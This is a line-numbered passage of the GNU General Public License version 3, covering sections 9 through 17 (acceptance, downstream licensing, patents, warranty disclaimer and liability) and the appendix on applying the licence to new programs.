432 | reinstated, you do not qualify to receive new licenses for the same
433 | material under section 10.
434 |
435 | 9. Acceptance Not Required for Having Copies.
436 |
437 | You are not required to accept this License in order to receive or
438 | run a copy of the Program. Ancillary propagation of a covered work
439 | occurring solely as a consequence of using peer-to-peer transmission
440 | to receive a copy likewise does not require acceptance. However,
441 | nothing other than this License grants you permission to propagate or
442 | modify any covered work. These actions infringe copyright if you do
443 | not accept this License. Therefore, by modifying or propagating a
444 | covered work, you indicate your acceptance of this License to do so.
445 |
446 | 10. Automatic Licensing of Downstream Recipients.
447 |
448 | Each time you convey a covered work, the recipient automatically
449 | receives a license from the original licensors, to run, modify and
450 | propagate that work, subject to this License. You are not responsible
451 | for enforcing compliance by third parties with this License.
452 |
453 | An "entity transaction" is a transaction transferring control of an
454 | organization, or substantially all assets of one, or subdividing an
455 | organization, or merging organizations. If propagation of a covered
456 | work results from an entity transaction, each party to that
457 | transaction who receives a copy of the work also receives whatever
458 | licenses to the work the party's predecessor in interest had or could
459 | give under the previous paragraph, plus a right to possession of the
460 | Corresponding Source of the work from the predecessor in interest, if
461 | the predecessor has it or can get it with reasonable efforts.
462 |
463 | You may not impose any further restrictions on the exercise of the
464 | rights granted or affirmed under this License. For example, you may
465 | not impose a license fee, royalty, or other charge for exercise of
466 | rights granted under this License, and you may not initiate litigation
467 | (including a cross-claim or counterclaim in a lawsuit) alleging that
468 | any patent claim is infringed by making, using, selling, offering for
469 | sale, or importing the Program or any portion of it.
470 |
471 | 11. Patents.
472 |
473 | A "contributor" is a copyright holder who authorizes use under this
474 | License of the Program or a work on which the Program is based. The
475 | work thus licensed is called the contributor's "contributor version".
476 |
477 | A contributor's "essential patent claims" are all patent claims
478 | owned or controlled by the contributor, whether already acquired or
479 | hereafter acquired, that would be infringed by some manner, permitted
480 | by this License, of making, using, or selling its contributor version,
481 | but do not include claims that would be infringed only as a
482 | consequence of further modification of the contributor version. For
483 | purposes of this definition, "control" includes the right to grant
484 | patent sublicenses in a manner consistent with the requirements of
485 | this License.
486 |
487 | Each contributor grants you a non-exclusive, worldwide, royalty-free
488 | patent license under the contributor's essential patent claims, to
489 | make, use, sell, offer for sale, import and otherwise run, modify and
490 | propagate the contents of its contributor version.
491 |
492 | In the following three paragraphs, a "patent license" is any express
493 | agreement or commitment, however denominated, not to enforce a patent
494 | (such as an express permission to practice a patent or covenant not to
495 | sue for patent infringement). To "grant" such a patent license to a
496 | party means to make such an agreement or commitment not to enforce a
497 | patent against the party.
498 |
499 | If you convey a covered work, knowingly relying on a patent license,
500 | and the Corresponding Source of the work is not available for anyone
501 | to copy, free of charge and under the terms of this License, through a
502 | publicly available network server or other readily accessible means,
503 | then you must either (1) cause the Corresponding Source to be so
504 | available, or (2) arrange to deprive yourself of the benefit of the
505 | patent license for this particular work, or (3) arrange, in a manner
506 | consistent with the requirements of this License, to extend the patent
507 | license to downstream recipients. "Knowingly relying" means you have
508 | actual knowledge that, but for the patent license, your conveying the
509 | covered work in a country, or your recipient's use of the covered work
510 | in a country, would infringe one or more identifiable patents in that
511 | country that you have reason to believe are valid.
512 |
513 | If, pursuant to or in connection with a single transaction or
514 | arrangement, you convey, or propagate by procuring conveyance of, a
515 | covered work, and grant a patent license to some of the parties
516 | receiving the covered work authorizing them to use, propagate, modify
517 | or convey a specific copy of the covered work, then the patent license
518 | you grant is automatically extended to all recipients of the covered
519 | work and works based on it.
520 |
521 | A patent license is "discriminatory" if it does not include within
522 | the scope of its coverage, prohibits the exercise of, or is
523 | conditioned on the non-exercise of one or more of the rights that are
524 | specifically granted under this License. You may not convey a covered
525 | work if you are a party to an arrangement with a third party that is
526 | in the business of distributing software, under which you make payment
527 | to the third party based on the extent of your activity of conveying
528 | the work, and under which the third party grants, to any of the
529 | parties who would receive the covered work from you, a discriminatory
530 | patent license (a) in connection with copies of the covered work
531 | conveyed by you (or copies made from those copies), or (b) primarily
532 | for and in connection with specific products or compilations that
533 | contain the covered work, unless you entered into that arrangement,
534 | or that patent license was granted, prior to 28 March 2007.
535 |
536 | Nothing in this License shall be construed as excluding or limiting
537 | any implied license or other defenses to infringement that may
538 | otherwise be available to you under applicable patent law.
539 |
540 | 12. No Surrender of Others' Freedom.
541 |
542 | If conditions are imposed on you (whether by court order, agreement or
543 | otherwise) that contradict the conditions of this License, they do not
544 | excuse you from the conditions of this License. If you cannot convey a
545 | covered work so as to satisfy simultaneously your obligations under this
546 | License and any other pertinent obligations, then as a consequence you may
547 | not convey it at all. For example, if you agree to terms that obligate you
548 | to collect a royalty for further conveying from those to whom you convey
549 | the Program, the only way you could satisfy both those terms and this
550 | License would be to refrain entirely from conveying the Program.
551 |
552 | 13. Use with the GNU Affero General Public License.
553 |
554 | Notwithstanding any other provision of this License, you have
555 | permission to link or combine any covered work with a work licensed
556 | under version 3 of the GNU Affero General Public License into a single
557 | combined work, and to convey the resulting work. The terms of this
558 | License will continue to apply to the part which is the covered work,
559 | but the special requirements of the GNU Affero General Public License,
560 | section 13, concerning interaction through a network will apply to the
561 | combination as such.
562 |
563 | 14. Revised Versions of this License.
564 |
565 | The Free Software Foundation may publish revised and/or new versions of
566 | the GNU General Public License from time to time. Such new versions will
567 | be similar in spirit to the present version, but may differ in detail to
568 | address new problems or concerns.
569 |
570 | Each version is given a distinguishing version number. If the
571 | Program specifies that a certain numbered version of the GNU General
572 | Public License "or any later version" applies to it, you have the
573 | option of following the terms and conditions either of that numbered
574 | version or of any later version published by the Free Software
575 | Foundation. If the Program does not specify a version number of the
576 | GNU General Public License, you may choose any version ever published
577 | by the Free Software Foundation.
578 |
579 | If the Program specifies that a proxy can decide which future
580 | versions of the GNU General Public License can be used, that proxy's
581 | public statement of acceptance of a version permanently authorizes you
582 | to choose that version for the Program.
583 |
584 | Later license versions may give you additional or different
585 | permissions. However, no additional obligations are imposed on any
586 | author or copyright holder as a result of your choosing to follow a
587 | later version.
588 |
589 | 15. Disclaimer of Warranty.
590 |
591 | THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
592 | APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
593 | HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
594 | OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
595 | THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
596 | PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
597 | IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
598 | ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
599 |
600 | 16. Limitation of Liability.
601 |
602 | IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
603 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
604 | THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
605 | GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
606 | USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
607 | DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
608 | PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
609 | EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
610 | SUCH DAMAGES.
611 |
612 | 17. Interpretation of Sections 15 and 16.
613 |
614 | If the disclaimer of warranty and limitation of liability provided
615 | above cannot be given local legal effect according to their terms,
616 | reviewing courts shall apply local law that most closely approximates
617 | an absolute waiver of all civil liability in connection with the
618 | Program, unless a warranty or assumption of liability accompanies a
619 | copy of the Program in return for a fee.
620 |
621 | END OF TERMS AND CONDITIONS
622 |
623 | How to Apply These Terms to Your New Programs
624 |
625 | If you develop a new program, and you want it to be of the greatest
626 | possible use to the public, the best way to achieve this is to make it
627 | free software which everyone can redistribute and change under these terms.
628 |
629 | To do so, attach the following notices to the program. It is safest
630 | to attach them to the start of each source file to most effectively
631 | state the exclusion of warranty; and each file should have at least
632 | the "copyright" line and a pointer to where the full notice is found.
633 |
634 |
635 | Copyright (C)
636 |
637 | This program is free software: you can redistribute it and/or modify
638 | it under the terms of the GNU General Public License as published by
639 | the Free Software Foundation, either version 3 of the License, or
640 | (at your option) any later version.
641 |
642 | This program is distributed in the hope that it will be useful,
643 | but WITHOUT ANY WARRANTY; without even the implied warranty of
644 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
645 | GNU General Public License for more details.
646 |
647 | You should have received a copy of the GNU General Public License
648 | along with this program. If not, see .
649 |
650 | Also add information on how to contact you by electronic and paper mail.
651 |
652 | If the program does terminal interaction, make it output a short
653 | notice like this when it starts in an interactive mode:
654 |
655 | Copyright (C)
656 | This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
657 | This is free software, and you are welcome to redistribute it
658 | under certain conditions; type `show c' for details.
659 |
660 | The hypothetical commands `show w' and `show c' should show the appropriate
661 | parts of the General Public License. Of course, your program's commands
662 | might be different; for a GUI interface, you would use an "about box".
663 |
664 | You should also get your employer (if you work as a programmer) or school,
665 | if any, to sign a "copyright disclaimer" for the program, if necessary.
666 | For more information on this, and how to apply and follow the GNU GPL, see
667 | .
668 |
669 | The GNU General Public License does not permit incorporating your program
670 | into proprietary programs. If your program is a subroutine library, you
671 | may consider it more useful to permit linking proprietary applications with
672 | the library. If this is what you want to do, use the GNU Lesser General
673 | Public License instead of this License. But first, please read
674 | .
675 |
--------------------------------------------------------------------------------